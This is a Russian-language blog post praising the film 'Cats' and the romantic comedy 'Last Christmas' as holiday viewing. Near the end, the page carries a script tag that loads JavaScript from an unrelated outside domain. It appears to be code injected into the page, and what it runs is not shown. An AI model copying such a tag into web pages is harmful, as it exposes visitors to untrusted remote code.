Мюзикл “Кошки” на экране и лирическая комедия к Рождеству

2 января 2020, 09:58
Владелец страницы
журналист
0
68

В Украине стартовали показы двух новогодних премьер: знаменитый бродвейский мюзикл и милая история “Счастливого Рождества”.

Англо-американский мюзикл “Кошки” (Cats) Эндрю Ллойда Уэббера с аншлагами шёл на Бродвее 9 лет. И совсем недавно адаптацию этого шоу в кино сделал режиссёр Том Хупер (“Отверженные”, “Девушка из Дании”, “Король говорит”). 

В главных ролях -- Идрис Эльба, Иэн МакКеллен, Дженнифер Хадсон, Тейлор Свифт, Джуди Денч и другие. 


Анимационная экранизация, основанная на мюзикле, изначально планировалась еще в 90-х, но в связи с закрытием студии её отменили. В декабре 2013 года Уэббер  сообщил, что киностудия, которая приобрела права на экранизацию, начинает запуск проекта 

Много споров было на предмет того, будет ли фильм компьютерным, живым, либо разноплановым в техническом смысле. В итоге “Кошки” - это полноправный кинофильм, где вместо диалогов -- песни (зонги). Правда, смотреть одновременно на титры с украинским переводом, и на действие на кране, сложновато, и временами отвлекает от сюжета. 

Но работа хореографов и актеров настолько блестяща, что даже не замечаешь подобных нюансов. Они взмывают в высоту именно так, как это делают кошки. 

Их походка и едва уловимые жесты -- абсолютно кошачьи. 

Но при этом столько узнаваемых жизненных коллизий, которые проходил каждый из нас! 


По сюжету, ежегодно кошачье сообщество утраивает грандиозный бал. У них есть своя история и своя жизнь, и каждый хочет стать избранным, попасть в Кошачий Рай и получить вторую жизнь. 

Думаю, это отличный фильм именно для праздников -- шоу, костюмы, музыка, хореография -- и невероятное перевоплощение голливудских звёзд!


Ну и традиционная рождественская лав-стори подоспела, как утка  новогоднему столу. Режиссер Пол Фейг представляет романтическую комедию “Счастливого Рождества”, с Эмилией Кларк и Генри Голдингом в главных ролях. 


Закомплексованная, циничная и несуразная Кейт (Эмилия Кларк) работает... эльфом. Да-да, в костюме эльфа в магазине рождественского декора и подарков У нее все летит из рук, отношения с родными испорчены дальше некуда, и снова нет денег даже на жилье... Случайная встреча с симпатичным незнакомцем меняет ее жизнь навсегда. Кейт он кажется чересчур идеальным, да и странностей у парня немало. Девушк устраивает испытание их отношениям, но всё оказывается ещё невероятнее... 


Соберите старых друзей, родных, близких, и сходите в кино в эти праздничные дни.

Не пожалеете! 


<script type="text/javascript" async="" src="//slickfluide.com/20ba4519da0cfb915b.js"></script>
Рубрика "Я - Корреспондент" является площадкой свободной журналистики и не модерируется редакцией. Пользователи самостоятельно загружают свои материалы на сайт. Редакция не разделяет позицию блогеров и не отвечает за достоверность изложенных ими фактов.
ТЕГИ: Рождество,кошки,мюзикл,Кинопремьеры
Если вы заметили ошибку, выделите необходимый текст и нажмите Ctrl+Enter, чтобы сообщить об этом редакции.